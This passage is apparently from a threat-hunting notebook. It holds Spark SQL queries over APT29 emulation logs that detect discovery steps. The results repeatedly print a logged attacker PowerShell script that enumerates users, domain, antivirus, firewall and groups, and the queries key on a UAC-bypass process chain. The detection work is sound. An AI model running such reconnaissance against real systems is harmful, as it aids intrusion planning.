----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   

4.C.6. System Information Discovery

Procedure: Enumerated the OS version using PowerShell

Criteria: powershell.exe executing​ Gwmi Win32_OperatingSystem

Detection Type:Telemetry(Correlated)

Query ID:5A2B7006-A887-465F-9D41-AED8F6AECBE1

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%gwmi win32_operatingsystem%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

Query ID:69A3B3AC-42BE-44F6-A418-C2356894F745

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%gwmi win32_operatingsystem%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

4.C.7. Security Software Discovery

Procedure: Enumerated anti-virus software using PowerShell

Criteria: powershell.exe executing​ Get-WmiObject …​ -Class AntiVirusProduct

Detection Type:Telemetry(Correlated)

Query ID:E1E0849D-1771-438B-9D8F-A67B7EC48B97

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%-class antivirusproduct%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

Query ID:956D78C8-FCB5-440D-B059-6790F729D02D

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%-class antivirusproduct%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

4.C.8. Security Software Discovery

Procedure: Enumerated firewall software using PowerShell

Criteria: powershell.exe executing Get-WmiObject …​​ -Class FireWallProduct

Detection Type:Telemetry(Correlated)

Query ID:9F924458-73AD-42C8-B98E-0CB4B4355B9B

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%-class firewallproduct%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

Query ID:B7549913-AF53-4F9A-9C3F-4106578EA5F2

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%-class firewallproduct%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

4.C.9. Permission Groups Discovery

Procedure: Enumerated user’s domain group membership via the NetUserGetGroups API

Criteria: powershell.exe executing the NetUserGetGroups API

Detection Type:technique(alert)

Query ID:FA458669-1C94-4150-AFFC-A3236FC6B275

df = spark.sql(
'''
SELECT a.EventTime, o.TargetUserName, o.IpAddress, a.Message
FROM apt29Host o
INNER JOIN (
    SELECT Message, EventTime, SubjectLogonId
    FROM apt29Host
    WHERE lower(Channel) = "security"
        AND EventID = 4661
        AND ObjectType = "SAM_DOMAIN"
        AND SubjectUserName NOT LIKE '%$'
        AND AccessMask = '0x20094'
        AND LOWER(Message) LIKE '%getlocalgroupmembership%'
    ) a
ON o.TargetLogonId = a.SubjectLogonId
WHERE lower(Channel) = "security" 
        AND o.EventID = 4624
        AND o.LogonType = 3

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 EventTime      | 2020-05-01 23:04:04                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
 TargetUserName | pbeesly                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            
 IpAddress      | 10.0.1.4                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           
 Message        | A handle to an object was requested.

Subject :
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x5DD594

Object:
	Object Server:	Security Account Manager
	Object Type:	SAM_DOMAIN
	Object Name:	DC=dmevals,DC=local
	Handle ID:	0x1fccecf7240

Process Information:
	Process ID:	0x2c0
	Process Name:	C:\Windows\System32\lsass.exe

Access Request Information:
	Transaction ID:	{00000000-0000-0000-0000-000000000000}
	Accesses:	READ_CONTROL
				ReadOtherParameters
				CreateUser
				GetLocalGroupMembership
				
	Access Reasons:		-
	Access Mask:	0x20094
	Privileges Used for Access Check:	-
	Properties:	---
	{19195a5a-6da0-11d0-afd3-00c04fd930c9}
READ_CONTROL
ReadOtherParameters
CreateUser
GetLocalGroupMembership
		{c7407360-20bf-11d0-a768-00aa006e0529}
			{bf9679a4-0de6-11d0-a285-00aa003049e2}
			{bf9679a5-0de6-11d0-a285-00aa003049e2}
			{bf9679a6-0de6-11d0-a285-00aa003049e2}
			{bf9679bb-0de6-11d0-a285-00aa003049e2}
			{bf9679c2-0de6-11d0-a285-00aa003049e2}
			{bf9679c3-0de6-11d0-a285-00aa003049e2}
			{bf967a09-0de6-11d0-a285-00aa003049e2}
			{bf967a0b-0de6-11d0-a285-00aa003049e2}
		{b8119fd0-04f6-4762-ab7a-4986c76b3f9a}
			{bf967a34-0de6-11d0-a285-00aa003049e2}
			{bf967a33-0de6-11d0-a285-00aa003049e2}
			{bf9679c5-0de6-11d0-a285-00aa003049e2}
			{bf967a61-0de6-11d0-a285-00aa003049e2}
			{bf967977-0de6-11d0-a285-00aa003049e2}
			{bf96795e-0de6-11d0-a285-00aa003049e2}
			{bf9679ea-0de6-11d0-a285-00aa003049e2}
		{ab721a52-1e2f-11d0-9819-00aa0040529b}

	Restricted SID Count:	0 

Detection Type:Telemetry(Correlated)

Query ID:11827B7C-8010-443C-9116-500289E0ED57

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%netusergetgroups%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

Query ID:52E7DFEA-05BC-4B81-BFE9-DE6085FA8228

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
